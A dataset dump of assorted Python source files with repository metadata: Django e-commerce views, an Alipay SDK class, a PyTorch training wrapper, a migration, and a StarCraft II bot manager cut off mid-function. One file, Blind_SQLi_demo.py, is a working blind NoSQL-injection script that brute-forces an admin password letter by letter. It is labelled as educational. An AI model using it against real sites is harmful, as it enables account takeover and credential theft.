hexsha (stringlengths 40..40) | size (int64 3..1.03M) | ext (stringclasses 10 values) | lang (stringclasses 1 value) | max_stars_repo_path (stringlengths 3..972) | max_stars_repo_name (stringlengths 6..130) | max_stars_repo_head_hexsha (stringlengths 40..78) | max_stars_repo_licenses (listlengths 1..10) | max_stars_count (int64 1..191k ⌀) | max_stars_repo_stars_event_min_datetime (stringlengths 24..24 ⌀) | max_stars_repo_stars_event_max_datetime (stringlengths 24..24 ⌀) | max_issues_repo_path (stringlengths 3..972) | max_issues_repo_name (stringlengths 6..130) | max_issues_repo_head_hexsha (stringlengths 40..78) | max_issues_repo_licenses (listlengths 1..10) | max_issues_count (int64 1..116k ⌀) | max_issues_repo_issues_event_min_datetime (stringlengths 24..24 ⌀) | max_issues_repo_issues_event_max_datetime (stringlengths 24..24 ⌀) | max_forks_repo_path (stringlengths 3..972) | max_forks_repo_name (stringlengths 6..130) | max_forks_repo_head_hexsha (stringlengths 40..78) | max_forks_repo_licenses (listlengths 1..10) | max_forks_count (int64 1..105k ⌀) | max_forks_repo_forks_event_min_datetime (stringlengths 24..24 ⌀) | max_forks_repo_forks_event_max_datetime (stringlengths 24..24 ⌀) | content (stringlengths 3..1.03M) | avg_line_length (float64 1.13..941k) | max_line_length (int64 2..941k) | alphanum_fraction (float64 0..1) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3d882ff63717c3ebe69686e1a7f5816476238d74 | 3,665 | py | Python | Ecommerce/views.py | aryanshridhar/Ecommerce-Website | c582659e9b530555b9715ede7bb774c39f101c7e | ["MIT"] | 1 | 2020-06-01T16:41:33.000Z | 2020-06-01T16:41:33.000Z | Ecommerce/views.py | aryanshridhar/Ecommerce-Website | c582659e9b530555b9715ede7bb774c39f101c7e | ["MIT"] | 4 | 2020-03-17T03:37:23.000Z | 2021-09-22T18:36:18.000Z | Ecommerce/views.py | aryanshridhar/Ecommerce-Website | c582659e9b530555b9715ede7bb774c39f101c7e | ["MIT"] | null | null | null |
from django.shortcuts import render , redirect
from django.contrib import messages
from django.http import HttpResponse
from .models import Product , Review , Cart
from .forms import ReviewForm
from django.contrib.auth.decorators import login_required
def homepage(request):
products = list(Product.objects.all())
desc_list = [products[i].desc for i in range(0,len(products))]
category = {products[i].category for i in range(len(products))}
length = list(map(len , desc_list))
items = {'pro' : products , 'number' : len(products) , 'category':category , 'length': length}
return render(request , 'Ecommerce/index.html' , items)
def checkout(request):
return HttpResponse('<h3>This page is under construction</h3>')
def productview(request , myid):
pressed_pro = list(Product.objects.filter(id=myid))[0]
incart = list(Cart.objects.filter(Item_id = myid))
username = None
if request.user.is_authenticated:
username = request.user
selected_review = list(filter(lambda item: item.for_product == pressed_pro , list(Review.objects.all())))
form = ReviewForm(request.POST or None)
if form.is_valid() and 'reviewbtn' in request.POST: #handling multiple forms
user_review = form.cleaned_data['Review']
model = Review(for_product = pressed_pro , Name = username , Review = user_review)
model.save()
messages.success(request , 'Your review has been posted successfully !')
return redirect(f'http://127.0.0.1:8000/Ecommerce/productview/{myid}') #handling multiple forms in a single page
if request.method == 'POST' and 'cartbtn' in request.POST:
if myid in Cart.objects.values_list('Item_id' , flat = True):
to_increase = list(Cart.objects.filter(Item_id = myid))[0]
to_increase.quantity += 1
to_increase.save()
else:
CartModel = Cart(Item = pressed_pro , foruser = username , quantity = 1 , price = pressed_pro.price)
CartModel.save()
        messages.success(request , 'The item has been added to your cart , check your cart <a href = "http://127.0.0.1:8000/Ecommerce/cart">here</a>')
return redirect(f'http://127.0.0.1:8000/Ecommerce/productview/{myid}')
if request.method == 'POST' and 'remove' in request.POST:
to_delete = list(Cart.objects.filter(Item_id = myid))[0]
to_delete.delete()
messages.success(request , f'{to_delete} has been removed from your cart')
return redirect(f'http://127.0.0.1:8000/Ecommerce/productview/{myid}')
item = {'pro': pressed_pro , 'form' : form , 'review' : selected_review, 'full_name' : username , 'incart' : incart}
return render(request , 'Ecommerce/productview.html' , item)
def products(request , value):
products = list(filter(lambda item: item.category == value , list(Product.objects.all())))
total_items = len(products)
context = {'name' : value , 'products' : products , 'total' : total_items}
return render(request , 'Ecommerce/products.html' , context)
@login_required(login_url = '/profile/login')
def cart(request):
current_user = request.user
total= sum(map(lambda x:x.quantity*x.price ,Cart.objects.filter(foruser = current_user)))
cart_products = list(zip(Cart.objects.filter(foruser = current_user) ,map(lambda x:x.quantity ,Cart.objects.filter(foruser = current_user)) , map(lambda x:x.quantity*x.price ,Cart.objects.filter(foruser = current_user))))
context = {'item' : cart_products , 'total' : total}
return render(request , 'Ecommerce/cart.html' , context)
def contact(request):
return render(request , 'Ecommerce/contact.html')
| 54.701493 | 225 | 0.688404 |
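These views assume routes that pass `myid` and `value` as path parameters; a minimal URLconf sketch for wiring them up (hypothetical module, the route names and prefixes are not taken from the repository):

# Hypothetical Ecommerce/urls.py -- route names and prefixes are assumptions.
from django.urls import path
from . import views

urlpatterns = [
    path('', views.homepage, name='homepage'),
    path('checkout/', views.checkout, name='checkout'),
    path('productview/<int:myid>', views.productview, name='productview'),
    path('products/<str:value>', views.products, name='products'),
    path('cart/', views.cart, name='cart'),
    path('contact/', views.contact, name='contact'),
]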
c37da082453be34af47d687e915e25ba787272d1 | 4,003 | py | Python | alipay/aop/api/request/ZhimaCustomerEpIdentificationQueryRequest.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | ["Apache-2.0"] | 213 | 2018-08-27T16:49:32.000Z | 2021-12-29T04:34:12.000Z | alipay/aop/api/request/ZhimaCustomerEpIdentificationQueryRequest.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | ["Apache-2.0"] | 29 | 2018-09-29T06:43:00.000Z | 2021-09-02T03:27:32.000Z | alipay/aop/api/request/ZhimaCustomerEpIdentificationQueryRequest.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | ["Apache-2.0"] | 59 | 2018-08-27T16:59:26.000Z | 2022-03-25T10:08:15.000Z |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.ZhimaCustomerEpIdentificationQueryModel import ZhimaCustomerEpIdentificationQueryModel
class ZhimaCustomerEpIdentificationQueryRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, ZhimaCustomerEpIdentificationQueryModel):
self._biz_content = value
else:
self._biz_content = ZhimaCustomerEpIdentificationQueryModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'zhima.customer.ep.identification.query'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
| 27.606897 | 148 | 0.647514 |
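A short usage sketch of the request class above, assuming the module is importable from the alipay SDK package; the URL and parameter values are placeholders:

# Hypothetical usage -- values are placeholders, not real API data.
req = ZhimaCustomerEpIdentificationQueryRequest()
req.notify_url = 'https://example.com/notify'   # placeholder callback URL
req.add_other_text_param('channel', 'test')     # lands in udf_params
params = req.get_params()
# params holds the fixed method name 'zhima.customer.ep.identification.query',
# the version, notify_url, and the extra text param merged in via udf_params.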
b508a18e28a3c46ec15030a3fc5702886ab1a004 | 6,113 | py | Python | notebooks/test/preprocessing/neural_networks.py | Yu-Group/adaptive-wavelets | e67f726e741d83c94c3aee3ed97a772db4ce0bb3 | ["MIT"] | 22 | 2021-02-13T05:22:13.000Z | 2022-03-07T09:55:55.000Z | notebooks/test/preprocessing/neural_networks.py | Yu-Group/adaptive-wavelets | e67f726e741d83c94c3aee3ed97a772db4ce0bb3 | ["MIT"] | null | null | null | notebooks/test/preprocessing/neural_networks.py | Yu-Group/adaptive-wavelets | e67f726e741d83c94c3aee3ed97a772db4ce0bb3 | ["MIT"] | 5 | 2021-12-11T13:43:19.000Z | 2022-03-19T07:07:37.000Z |
import torch
from torch import nn, optim
from torch.nn import functional as F
import numpy as np
from tqdm import tqdm
import torch.utils.data as data_utils
from features import downsample
import pickle as pkl
import models
class neural_net_sklearn():
"""
sklearn wrapper for training a neural net
"""
def __init__(self, D_in=40, H=40, p=17, epochs=1000, batch_size=100, track_name='X_same_length_normalized', arch='fcnn', torch_seed=2):
"""
Parameters:
==========================================================
D_in, H, p: int
same as input to FCNN
epochs: int
number of epochs
batch_size: int
batch size
track_name: str
column name of track (the tracks should be of the same length)
"""
torch.manual_seed(torch_seed)
self.D_in = D_in
self.H = H
self.p = p
self.epochs = epochs
self.batch_size = batch_size
self.track_name = track_name
self.torch_seed = torch_seed
self.arch = arch
torch.manual_seed(self.torch_seed)
if self.arch == 'fcnn':
self.model = models.FCNN(self.D_in, self.H, self.p)
elif 'lstm' in self.arch:
self.model = models.LSTMNet(self.D_in, self.H, self.p)
elif 'cnn' in self.arch:
self.model = models.CNN(self.D_in, self.H, self.p)
elif 'attention' in self.arch:
self.model = models.AttentionNet(self.D_in, self.H, self.p)
elif 'video' in self.arch:
self.model = models.VideoNet()
def fit(self, X, y, verbose=False, checkpoint_fname=None, device='cpu'):
"""
Train model
Parameters:
==========================================================
X: pd.DataFrame
input data, should contain tracks and additional covariates
y: np.array
input response
"""
torch.manual_seed(self.torch_seed)
if self.arch == 'fcnn':
self.model = models.FCNN(self.D_in, self.H, self.p)
elif 'lstm' in self.arch:
self.model = models.LSTMNet(self.D_in, self.H, self.p)
elif 'cnn' in self.arch:
self.model = models.CNN(self.D_in, self.H, self.p)
elif 'attention' in self.arch:
self.model = models.AttentionNet(self.D_in, self.H, self.p)
elif 'video' in self.arch:
self.model = models.VideoNet()
# convert input dataframe to tensors
X_track = X[self.track_name] # track
X_track = torch.tensor(np.array(list(X_track.values)), dtype=torch.float)
if len(X.columns) > 1: # covariates
X_covariates = X[[c for c in X.columns if c != self.track_name]]
X_covariates = torch.tensor(np.array(X_covariates).astype(float), dtype=torch.float)
else:
X_covariates = None
# response
y = torch.tensor(y.reshape(-1, 1), dtype=torch.float)
# initialize optimizer
optimizer = optim.Adam(self.model.parameters(), lr=0.001)
# initialize dataloader
if X_covariates is not None:
dataset = torch.utils.data.TensorDataset(X_track, X_covariates, y)
else:
dataset = torch.utils.data.TensorDataset(X_track, y)
train_loader = torch.utils.data.DataLoader(dataset,
batch_size=self.batch_size,
shuffle=True)
#train_loader = [(X1, X2, y)]
# train fcnn
print('fitting dnn...')
self.model = self.model.to(device)
for epoch in tqdm(range(self.epochs)):
train_loss = 0
for batch_idx, data in enumerate(train_loader):
optimizer.zero_grad()
# print('shapes input', data[0].shape, data[1].shape)
if X_covariates is not None:
preds = self.model(data[0].to(device), data[1].to(device))
y = data[2].to(device)
else:
preds = self.model(data[0].to(device))
y = data[1].to(device)
loss_fn = torch.nn.MSELoss()
loss = loss_fn(preds, y)
loss.backward()
train_loss += loss.item()
optimizer.step()
if verbose:
print(f'Epoch: {epoch}, Average loss: {train_loss/len(X_track):.4e}')
elif epoch % (self.epochs // 10) == 99:
print(f'Epoch: {epoch}, Average loss: {train_loss/len(X_track):.4e}')
if checkpoint_fname is not None:
pkl.dump({'model_state_dict': self.model.state_dict()},
open(checkpoint_fname, 'wb'))
def predict(self, X_new):
"""
make predictions with new data
Parameters:
==========================================================
X_new: pd.DataFrame
input new data, should contain tracks and additional covariates
"""
self.model.eval()
with torch.no_grad():
# convert input dataframe to tensors
X_new_track = X_new[self.track_name]
X_new_track = torch.tensor(np.array(list(X_new_track.values)), dtype=torch.float)
if len(X_new.columns) > 1:
X_new_covariates = X_new[[c for c in X_new.columns if c != self.track_name]]
X_new_covariates = torch.tensor(np.array(X_new_covariates).astype(float), dtype=torch.float)
preds = self.model(X_new_track, X_new_covariates)
else:
preds = self.model(X_new_track)
return preds.data.numpy().reshape(1, -1)[0]
| 37.503067 | 139 | 0.515786 |
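A self-contained sketch (toy data, not from the repository) of the same DataFrame-to-tensor conversion that fit() performs on the track column and the covariates, to show the input layout the wrapper expects:

# Toy illustration of the expected input: one fixed-length track per row plus
# optional scalar covariate columns.
import numpy as np
import pandas as pd
import torch

track_name = 'X_same_length_normalized'
df = pd.DataFrame({
    track_name: [np.random.randn(40) for _ in range(8)],  # 8 tracks of length 40
    'cov_a': np.random.randn(8),
    'cov_b': np.random.randn(8),
})
X_track = torch.tensor(np.array(list(df[track_name].values)), dtype=torch.float)
X_cov = torch.tensor(
    np.array(df[[c for c in df.columns if c != track_name]]).astype(float),
    dtype=torch.float)
print(X_track.shape, X_cov.shape)  # torch.Size([8, 40]) torch.Size([8, 2])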
d3073477b3fd056b1a524ccc950c681675170f7a | 1,360 | py | Python | migrations/versions/4965ed66d657_initial_migration.py | danielmuthama/P_Blog | 0712678328d5270e266fef530462630a57c546cd | ["MIT"] | 1 | 2022-03-24T06:47:07.000Z | 2022-03-24T06:47:07.000Z | migrations/versions/4965ed66d657_initial_migration.py | danielmuthama/P_Blog | 0712678328d5270e266fef530462630a57c546cd | ["MIT"] | null | null | null | migrations/versions/4965ed66d657_initial_migration.py | danielmuthama/P_Blog | 0712678328d5270e266fef530462630a57c546cd | ["MIT"] | null | null | null |
"""Initial Migration
Revision ID: 4965ed66d657
Revises: ee5a4f1305d0
Create Date: 2021-09-27 12:37:39.345275
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '4965ed66d657'
down_revision = 'ee5a4f1305d0'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('blog',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('blogtitle', sa.String(length=255), nullable=True),
sa.Column('myblog', sa.String(), nullable=True),
sa.Column('postdate', sa.DateTime(), nullable=True),
sa.Column('author', sa.String(length=255), nullable=True),
sa.Column('category', sa.String(length=255), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('votes',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('blog_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['blog_id'], ['blog.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('votes')
op.drop_table('blog')
# ### end Alembic commands ###
| 29.565217 | 65 | 0.666912 |
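For orientation, a hypothetical declarative model matching the 'blog' table this revision creates; the column names and types are read off the op.create_table() call above, not taken from the project's actual models, and SQLAlchemy 1.4+ is assumed:

# Hypothetical reconstruction of the 'blog' table as a declarative model.
from sqlalchemy import Column, DateTime, ForeignKey, Integer, String
from sqlalchemy.orm import declarative_base

Base = declarative_base()

class Blog(Base):
    __tablename__ = 'blog'
    id = Column(Integer, primary_key=True)
    blogtitle = Column(String(255))
    myblog = Column(String)
    postdate = Column(DateTime)
    author = Column(String(255))
    category = Column(String(255))
    user_id = Column(Integer, ForeignKey('users.id'))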
4bc02ca7ee4055a6a928ea77a9e7c56d2e8fd8df | 4,452 | py | Python | Blind_SQLi_demo.py | KirinFuji/PentestSnips | a4e6818673f4629ccf6842617f123c63956206f0 | ["MIT"] | null | null | null | Blind_SQLi_demo.py | KirinFuji/PentestSnips | a4e6818673f4629ccf6842617f123c63956206f0 | ["MIT"] | null | null | null | Blind_SQLi_demo.py | KirinFuji/PentestSnips | a4e6818673f4629ccf6842617f123c63956206f0 | ["MIT"] | null | null | null |
# Written by github.com/KirinFuji
"""
MIT License
Copyright (c) 2021 KirinFuji@users.noreply.github.com
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
# Disclaimer: DO NOT use this for malicious purposes, this is for purely educational purposes as a sample of how
# a hacker may abuse a Blind SQLi vulnerability to steal a users password.
# Simple Blind SQLi script
from abc import ABC
import aiohttp
import asyncio
import re
import urllib.parse
from html.parser import HTMLParser
from string import ascii_lowercase
class MyHTMLParser(HTMLParser, ABC):
def __init__(self, username):
HTMLParser.__init__(self)
self.user_found = False
self.username = username
# Parser will need to be modified depending on the webserver
def handle_data(self, data):
data = re.sub(r'\s+', ' ', data)
if data != ' ':
if data == self.username:
self.user_found = True
class BruteForce:
def __init__(self, website, parameter, chars_, user):
self.user_search = user
self.website = website
self.parameter = parameter
self.parser = MyHTMLParser(self.user_search)
self.chars = chars_
self.delay = 0.2
self.session = None
async def web_request(self, url):
async with self.session.get(url) as resp:
text = await resp.text()
return text
def create_request(self, pattern):
# Parameter vulnerable to SQLi
site = self.website + self.parameter
# SQL/NoSQL query to inject
query = rf"{self.user_search}' && this.password.match(/{pattern}/)"
# URL Encode the request
encoded_query = urllib.parse.quote(query)
# Combine it and add null byte
return site + encoded_query + '%00'
async def find_next_char(self, password):
for char in self.chars:
# Reset Parser
self.parser.user_found = False
# Create full encoded URL to request
request = self.create_request(f'^{password + str(char)}.*$')
print(f'GET: {request}')
# Send the request
result = await self.web_request(request)
# Parse the HTML looking for username
self.parser.feed(result)
if self.parser.user_found:
# Append the discovered character to the password
password += str(char)
print(f'Pass: {password}')
return password
await asyncio.sleep(self.delay)
return None
async def brute_force(self):
password = ''
async with aiohttp.ClientSession() as session:
self.session = session
while not self.session.closed:
result = await self.find_next_char(password)
# If no new character was found, end loop, else check for next character
if result is None:
break
else:
password = result
await self.session.close()
self.session = None
return f'Final: {password}'
if __name__ == '__main__':
chars = '-0123456789'
chars += ascii_lowercase
# Website, Vulnerable Parameter, chars to check for, brute forcing password for this user
Brute = BruteForce('http://example.com/?', 'search=', chars, 'admin')
Brute.delay = 0.1
finished = asyncio.run(Brute.brute_force())
print(finished)
| 36.195122 | 112 | 0.655436 |
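A self-contained sketch of the string that create_request() assembles for a single guess, using the same placeholder site and parameter as the __main__ block above; it only re-renders two lines of the existing code to make the URL encoding concrete:

# What create_request() would emit when testing whether the password starts
# with 'a' (placeholder site/parameter, trailing null byte as in the script).
import urllib.parse

site = 'http://example.com/?' + 'search='
query = r"admin' && this.password.match(/^a.*$/)"
url = site + urllib.parse.quote(query) + '%00'
print(url)
# e.g. http://example.com/?search=admin%27%20%26%26%20this.password.match%28/%5Ea.%2A%24/%29%00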
e0f53805ab2f5ea01cd2f18208750b866d690319 | 15,976 | py | Python | bot/logic/unit_manager/unit_manager.py | Scottdecat/HiveMind | cbd9de0645d756a63d65918f6c971753e1178652 | ["MIT"] | null | null | null | bot/logic/unit_manager/unit_manager.py | Scottdecat/HiveMind | cbd9de0645d756a63d65918f6c971753e1178652 | ["MIT"] | null | null | null | bot/logic/unit_manager/unit_manager.py | Scottdecat/HiveMind | cbd9de0645d756a63d65918f6c971753e1178652 | ["MIT"] | null | null | null |
import math
import random
from collections import defaultdict
from math import sqrt
from typing import Union
import bot.injector as injector
from bot.logic.army_strategy_manager.army_strategy_manager_interface import \
ArmyStrategyManagerInterface
from bot.logic.overlord_manager import OverlordManager
from bot.logic.queen_manager.default_queen_manager import DefaultQueenManager
from bot.logic.spending_actions.default_spending_actions import \
DefaultSpendingActions
from bot.logic.unit_manager.priority_calculations import (
enemy_group_priority, unit_desperation_threshold, unit_to_group_priority)
from bot.model.unit_type_abstraction import UnitTypeAbstraction
from bot.services.action_service import ActionService
from bot.services.debug_service import DebugService
from bot.services.state_service import StateService
from bot.services.unit_group_service import UnitGroup, UnitGroupService
from bot.services.unit_type_service import UnitTypeService
from bot.util.mapping_functions import steep_decline
from bot.util.priority_queue import PriorityQueue
from bot.util.unit_type_utils import get_unit_origin_type, is_combat_unit
from sc2 import AbilityId, UnitTypeId
from sc2.position import Point3, Rect
from sc2.unit import Unit
from sc2.units import Units
from .assigned_group import AssignedGroup
from .group_tactics import GroupTactics, distance_from_boundary
from .micro import Micro
from .worker_distribution import WorkerDistributor
class UnitManager:
def __init__(self):
self.state: StateService = injector.inject(StateService)
self.debug_service: DebugService = injector.inject(DebugService)
self.group_service: UnitGroupService = injector.inject(UnitGroupService)
self.action_service: ActionService = injector.inject(ActionService)
self.unit_type: UnitTypeService = injector.inject(UnitTypeService)
self.group_tactics: GroupTactics = GroupTactics()
self.micro: Micro = Micro()
self.worker_distributor: WorkerDistributor = WorkerDistributor()
self.spending_actions = DefaultSpendingActions()
self.overlord_manager = OverlordManager()
self.queen_manager = DefaultQueenManager()
self.assigned_groups = []
self.previously_assigned_units = {}
self.proxy_scouts: Units = Units([])
self.proxy_scout_idx: int = 0
self.expansion_locations: list = []
def on_init(self) -> None:
expansion_locations = list(self.state._bot.expansion_locations.keys())
expansion_locations.append(self.state._bot.enemy_start_locations[0])
expansion_locations.sort(key=lambda p: p.distance_to(self.state._bot.enemy_start_locations[0]))
self.expansion_locations = expansion_locations
async def on_step(self):
unassigned = self.state.own_units
enemy_groups: PriorityQueue = self.state.enemy_groups
self.assigned_groups = self.assign_groups(unassigned, enemy_groups)
builder_units: Units = self.get_builder_units(unassigned, self.state.enemy_groups)
assigned_tags = set()
for g in self.assigned_groups:
assigned_tags = assigned_tags.union(self.group_tactics.manage_group(g))
await self.micro.micro_units(g.group.units, assigned_tags)
unassigned = unassigned.tags_not_in(assigned_tags)
a = await self.spending_actions.build(self.state.build_queue, builder_units)
unassigned = unassigned.tags_not_in(a.tags)
# saturate remaining workers
unassigned_workers = unassigned({UnitTypeId.DRONE, UnitTypeId.SCV, UnitTypeId.PROBE, UnitTypeId.MULE})
self.worker_distributor.distribute_workers(unassigned_workers)
unassigned = unassigned.tags_not_in(unassigned_workers.tags)
unassigned_overlords = unassigned({UnitTypeId.OVERLORD, UnitTypeId.OVERSEER})
await self.overlord_manager.on_step(unassigned_overlords)
unassigned = unassigned.tags_not_in(unassigned_overlords.tags)
unassigned_queens = unassigned({UnitTypeId.QUEEN})
unassigned = unassigned.tags_not_in(await self.queen_manager.on_step(unassigned_queens))
# use remaining units to do cool things
# scout enemy bases with idle units
#TODO ideally, should only reassign idle proxy scouts. However, can't really figure out how to get that working, so just putting this hack for now.
if unassigned.exists:
to_remove = set()
for s in self.proxy_scouts:
s: Unit
tag = s.tag
s = self.state.own_units.find_by_tag(s.tag)
if not s or s.tag not in unassigned.tags or s.is_idle:
to_remove.add(tag)
self.proxy_scouts = self.proxy_scouts.tags_not_in(to_remove)
missing_scouts = 4 - self.proxy_scouts.amount
new_scouts = unassigned({UnitTypeId.ZERGLING, UnitTypeId.ROACH}).sorted(lambda u: u.movement_speed, reverse=True).take(missing_scouts, require_all=False)
for scout in new_scouts:
scout: Unit
self.action_service.add(scout.tag, scout.move(random.choice(self.expansion_locations)))
self.proxy_scouts.append(scout)
unassigned = unassigned.tags_not_in(self.proxy_scouts.tags)
'''
if (int(self.state.getTimeInSeconds()) % 15) == 0:
self.reassign_proxy_scouts()
num_scouting_units = 4
if self.proxy_scouts.amount < num_scouting_units and self.state.mode == 'defend':
unassigned_scouts = unassigned.filter(self.is_scout)
unassigned_scouts = unassigned_scouts.sorted(lambda u: u.movement_speed, reverse=True).take(num_scouting_units - self.proxy_scouts.amount, require_all=False)
self.append_proxy_scouts(unassigned_scouts)
elif self.state.mode == 'attack':
unassigned_scouts = unassigned.filter(self.is_scout)
self.append_proxy_scouts(unassigned_scouts)
unassigned = unassigned.tags_not_in(self.proxy_scouts.tags)
'''
# idle position at nearest base
for unit in unassigned:
unit: Unit
if unit.movement_speed > 0 and unit.type_id not in {UnitTypeId.OVERLORD, UnitTypeId.LARVA}:
pos = unit.position.closest(self.state.own_townhalls).position
if unit.distance_to(pos) < 10:
self.action_service.add(unit.tag, unit.attack(pos))
else:
self.action_service.add(unit.tag, unit.move(pos))
self.debug_service.text_world(f'IDLE', unit.position3d, None, 16)
def priority_apply_unit_modifier(self, priority, enemy_group: UnitGroup, unit: Unit):
if enemy_group.range_hull:
dist = distance_from_boundary(enemy_group.range_hull, unit.position)
else:
dist = unit.position.distance_to(enemy_group.location)
dist = min(self.state.map_diagonal_len, max(0, dist))
dist_mod = dist / self.state.map_diagonal_len
dist_mod = (0.5 + steep_decline(dist_mod)) ** 2
# increase priority by if unit was assigned to this group in the last iteration
percentage_of_previously_assigned = 0
if unit.tag in self.previously_assigned_units:
intersection = enemy_group.units.tags.intersection(self.previously_assigned_units[unit.tag])
percentage_of_previously_assigned = len(intersection) / len(enemy_group.units.tags)
prev_mod = 1 + percentage_of_previously_assigned
return priority * dist_mod * prev_mod
class Temp:
units: Units
value = 0
ground_value = 0
air_value = 0
cloak = 0
retreaters: Units
def unit_activation_function(self, unit: Unit, priority, enemy_group: UnitGroup, oversaturation = 0):
if unit.type_id == UnitTypeId.DRONE:
return priority > 0.1 and enemy_group.units.exclude_type(UnitTypeId.REAPER).exists and (oversaturation == 0 and (
(
unit.distance_to(enemy_group.units.center) < 15
and (self.state.own_townhalls.exists
and (unit.distance_to(self.state.own_townhalls.closest_to(enemy_group.location).position) < 20))
)
or (enemy_group.location.distance_to(self.state.own_natural_position) < 10)
or (
enemy_group.units({UnitTypeId.PHOTONCANNON, UnitTypeId.PYLON}).exists
and enemy_group.location.distance_to_closest(self.state.own_townhalls) < 20
))
) or (
enemy_group.value > 100
and enemy_group.units.exclude_type({UnitTypeId.SCV, UnitTypeId.PROBE, UnitTypeId.DRONE}).exists
and enemy_group.range_hull
and distance_from_boundary(enemy_group.range_hull, unit.position) <= 1
and unit.position.distance_to_closest(self.state.own_townhalls) < 15
)
elif unit.type_id == UnitTypeId.QUEEN:
return priority > 0 and (enemy_group.location.distance_to_closest(self.state.own_townhalls.ready) < 20 or (self.state._bot.has_creep(enemy_group.location) and enemy_group.location.distance_to_closest(self.state.own_townhalls.ready) < 30))
elif unit.type_id in {UnitTypeId.CHANGELING, UnitTypeId.CHANGELINGMARINE, UnitTypeId.CHANGELINGMARINESHIELD, UnitTypeId.CHANGELINGZEALOT, UnitTypeId.CHANGELINGZERGLING, UnitTypeId.CHANGELINGZERGLINGWINGS}:
return False
elif unit.type_id == UnitTypeId.OVERSEER:
return enemy_group.cloak_value > 0
else:
return priority > 0
def assign_groups(self, unassigned: Units, priorities: PriorityQueue):
groups = []
units = unassigned.not_structure.filter(is_combat_unit)
d = {}
for enemy_group in priorities:
t = self.Temp()
t.units = Units([])
t.retreaters = Units([])
d[enemy_group] = t
#assign army units
unit_to_priorities = defaultdict(PriorityQueue)
for unit in units:
for p in priorities.iterate2():
priority = self.priority_apply_unit_modifier(p[1], p[0], unit)
unit_to_priorities[unit].enqueue(p[0], priority)
#sort units so that those who have a very high priority for the first enemy group
#and low priority for the rest are assigned first
def sort_by_diff(unit: Unit):
s = 0
if not unit_to_priorities[unit].isEmpty():
prio = unit_to_priorities[unit].peek2()
enemy_group = prio[0]
priority = prio[1]
percentage_of_previously_assigned = 0
if unit.tag in self.previously_assigned_units:
intersection = enemy_group.units.tags.intersection(self.previously_assigned_units[unit.tag])
percentage_of_previously_assigned = len(intersection) / len(enemy_group.units.tags)
s = 0.5 + (percentage_of_previously_assigned / 2) * priority
return s
if not priorities.isEmpty():
